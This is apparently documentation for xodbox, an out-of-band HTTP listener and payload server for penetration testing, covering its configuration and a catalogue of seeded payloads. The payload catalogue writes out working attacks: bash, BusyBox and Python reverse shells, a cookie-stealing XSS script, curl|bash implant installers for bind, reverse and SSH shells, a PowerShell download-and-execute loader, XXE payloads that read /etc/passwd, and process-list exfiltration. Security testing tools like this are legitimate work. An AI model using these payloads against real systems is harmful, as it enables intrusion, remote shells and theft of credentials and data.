This is the multi-page printable view of this section. Click here to print.

Return to the regular view of this page.

HTTPX

HTTPX Handler

1: Default Payloads Seeds

1.1: Default Header
1.2: Redirect
1.3: Remote Address Reflector
1.4: Robots TXT
1.5: Build MDaaS
1.6: Inspect
1.7: XSS HTML
1.8: XSS JavaScript
1.9: Default Favicon
1.10: Bash Reverse Shell
1.11: Bind Shell
1.12: BusyBox Reverse Shell
1.13: Detect platform
1.14: HTML IFrame With Request Params
1.15: Open Graph
1.16: Python Reverse Shell
1.17: Reverse Shell
1.18: Simple SSH
1.19: Simple SSH Service
1.20: XSS Image Template
1.21: XXE Callback
1.22: XXE DTD
1.23: XXE SVG Hostname
1.24: XXE SVG Passwd
1.25: XXE SVG Request Params
1.26: XXE System
1.27: Default Page
1.28: In Development Seeds

1.28.1: Bind shell powershell
1.28.2: Pipe Process List to Notifier
1.28.3: WPAD

2: Example Payloads

2.1: List Payloads

Purpose

The primary HTTP/HTTPS listener. It serves user-defined payloads keyed by URL pattern, hosts static assets, exposes a private JSON API, and can transparently provision Let’s Encrypt certificates via ACME-DNS-01. Every request produces an InteractionEvent so out-of-band HTTP reach-out from an application under test can be asserted against expected paths and headers.

Behaviour

HTTP serves the bundled payload database (see payload_db_seed.go for the seeded set). Additional payloads can be loaded from a watched directory via payload_dir; changes are picked up via fsnotify and debounced into the database.
HTTPS mode activates when tls_names is set; certmagic provisions certificates via ACME-DNS-01 against the configured dns_provider. Without dns_provider, HTTPS will fall back to HTTP-01 / TLS-ALPN challenges, which require port 80/443 reachability from the internet.
Bot suppression: clients that exceed 30 requests in any one-minute bucket are marked as bots (model.IsBot) and have their subsequent events suppressed from notifier delivery. The bot threshold is not configurable today.
The private API (mounted at api_path) requires the header Authorization: Token <api_token> on every request. An empty api_token rejects all callers.
Embedded static assets ship at /ixdbxi/.

Configuration

General

Key	Required	Default	Notes
`handler`	yes	—	Must be `HTTPX`.
`listener`	yes	—	Bind address, e.g. `:80` or `:8080`.
`static_dir`	no	—	Directory served at `/static/`. Created on first start with mode `0750` if missing.
`payload_dir`	no	—	Directory of `*.md` payload definitions. Watched at runtime; updates are upserted.
`api_path`	no	—	URL path prefix to mount the JSON API on, e.g. `/api`. Normalised to leading/trailing slash.
`api_token`	no	—	Bearer-style token required by the `/private/*` API routes.

TLS / ACME

Key	Required	Default	Notes
`tls_names`	no	—	Comma-separated hostnames. Setting any value enables HTTPS via certmagic.
`acme_email`	no	—	ACME account contact address.
`acme_accept`	no	`false`	Must be the literal string `"true"` to accept the ACME provider’s terms of service.
`acme_url`	no	—	ACME directory URL. Defaults to Let’s Encrypt production; use the staging URL for testing.
`dns_provider`	no	—	One of `namecheap` or `route53`. Required for the DNS-01 challenge path.
`dns_provider_api_user`	no	—	API user (namecheap only).
`dns_provider_api_key`	no	—	API key (namecheap only).

MDaaS (Malicious Daemon as a Service) cross-compile

These keys are baked into binaries served from the /build/<os>/<arch>/<program> route. Only useful when payloads request a build.

Key	Required	Default	Notes
`mdaas_log_level`	no	—	One of `NONE`, `INFO`, `WARN`, `ERROR`, `DEBUG`.
`mdaas_bind_listener`	no	—	Listener address baked into the built MDaaS binary.
`mdaas_allowed_cidr`	no	—	CIDR allowed to connect to the built MDaaS binary at runtime.
`mdaas_notify_url`	no	—	Webhook URL the built binary calls back to.

Filters

The entire HTTP request (request line + headers + body) is fed to the notifier filter regexps. To alert on a specific prefix:

filter: "(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"

This would match:

https://test.example/myPrefixexample
https://test.example/myPrefix/example
https://test.example/myPrefix/asdasd/asdasd/asd/as/d

And would not match:

https://test.example/robots.txt
https://test.example/asd/myPrefix/example

Operational notes

Stop(ctx) shuts down whichever server pair Start booted: in HTTP mode, the single *http.Server; in HTTPS mode, both the ACME HTTP-01 challenge listener on :80 and the TLS listener on :443. The payload-directory watcher goroutine (if payload_dir was set) is also cancelled. ctx bounds how long in-flight requests have to drain.
Sensitive operator keys (api_token, dns_provider_api_key) end up in the xodbox config file. Restrict that file’s permissions to 0600 and the running user.

Backlog

New features

Let’s Encrypt Auto Cert
Exfil data saver

Legacy functionality to be implemented

robots.txt
unfurly
arbitrary json
- b64
redirect
- b64
basic auth
breakfastbot
allow origin *

Legacy functionality that isn’t specific to a handler

alert pattern with payload
alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
slack hook (this is now a notifier)

1 - Default Payloads Seeds

seed data

Default payloads that come with xodbox.

1.1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

1.2 - Redirect

HTTP Redirects

HTTP Redirects to the query parameter l using the query param s as the status code.

What	Description	GET Parameters
Location	Location to redirect to	`l`
Status	HTTP status code	`s`

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

1.3 - Remote Address Reflector

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/ip

Example Response

10.1.2.3

1.4 - Robots TXT

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

1.5 - Build MDaaS

Build random binaries

1.6 - Inspect

Reflect back HTTP requests in various formats

Depends on an internal code

`/inspect`

Inspect or reflect the request back in various formats.

Plain Text (default, .txt)
HTML (.html, .html)
GIF (.gif)
JPEG (.jpg)
PNG (.png)
MP4 (.mp4)
XML (.xml)
JSON (.json)
Javascript (.js)

Examples

http://localhost/inspect
http://localhost/some/random/path/inspect.gif

1.7 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML to load simple JS Payload.

1.8 - XSS JavaScript

Returns JS that embeds an image back to xodbox

/jsc

Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{.Request.Host}}/{{ .NotifyString}}/jscb?src="+window.location+"&c="+document.cookie;
})()

1.9 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

1.10 - Bash Reverse Shell

BusyBox Reverse Shell

Useful for reverse shells on busybox systems.

Example Request

Params

Parameter	Default Value	Description
h	Client IP address	Host to connect to
p	9091	Port to connect to

curl -i "http://xodbox.test/rsh/bash?h=10.10.10.10&p=9090"

Example Response

bash -i >& /dev/tcp/127.0.0.1/9091 0>&1
0<&196;exec 196<>/dev/tcp/127.0.0.1/9091 ; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/127.0.0.1/9091 0<&1 2>&1

1.11 - Bind Shell

Requires bind-shell in static dir

Build a bind shell implant for the specific platform and execute it.

Example Request

curl xodbox/bind.sh|bash

1.12 - BusyBox Reverse Shell

BusyBox Reverse Shell

Useful for reverse shells on busybox systems.

Example Request

Params

Parameter	Default Value	Description
h	Client IP address	Host to connect to
p	9091	Port to connect to

curl -i "http://xodbox.test/rsh/bb?h=10.10.10.10&p=9090"

Example Response

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1111 >/tmp/f

1.13 - Detect platform

detect platform

Example Request

curl -i "http://xodbox.test/detect.sh"

This will curl the notification url with the detected values in the path.

1.14 - HTML IFrame With Request Params

Returns an HTML page with an iframe src to f query parameter

/ht

attempts to get whatever files is supplied via the f query parameter

1.15 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

1.16 - Python Reverse Shell

Python Reverse Shell

Useful for reverse shells on busybox systems.

Example Request

Params

Parameter	Default Value	Description
h	Client IP address	Host to connect to
p	9091	Port to connect to

curl -i "http://xodbox.test/rsh/python?h=10.10.10.10&p=9090"

Example Response

import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",9091));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")

1.17 - Reverse Shell

Requires bind-shell in static dir

Build a reverse shell implant for the specific platform and execute it.

Example Request

curl xodbox/reverse.sh|bash

1.18 - Simple SSH

Simple SSH (requires build of simple ssh server in static dir)

Build an SSH server implant for the specific platform and execute it.

Example Request

curl xodbox/ssh.sh|bash

1.19 - Simple SSH Service

Simple SSH Service (requires build of simple ssh server in static dir)

Build an SSH server implant for the specific platform and install it as a service, then start the service.

Example Request

curl xodbox/ssh.sh|bash

1.20 - XSS Image Template

A text template for quickly embedding js execution hooks into pages the image tags

1.21 - XXE Callback

More XXE

XXE Callback used by xxe-system

1.22 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

1.23 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

attempts to get /etc/hostname

SVG with XXE payloads

1.24 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

attempts to get /etc/passwd

1.25 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

attempts to get whatever files is supplied via the f query parameter

1.26 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

1.27 - Default Page

returns a simple page if nothing is matched

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

hi

1.28 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

1.28.1 - Bind shell powershell

Requires bind-shell in static dir

iex ((New-Object System.Net.WebClient).DownloadString('http://xobox/bind.ps1'))

1.28.2 - Pipe Process List to Notifier

Simple script to pipe ps to the notification URL

Example Request

curl xodbox/pipe.sh|bash

1.28.3 - WPAD

Returns a WPAD config file (Javascript).

WPAD Proxy. Not really useful at the moment. Should be more useful in the future

2 - Example Payloads

Examples

Default payloads that come with xodbox.

2.1 - List Payloads

List payloads

List Payloads

---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    
    {{ end }}    
---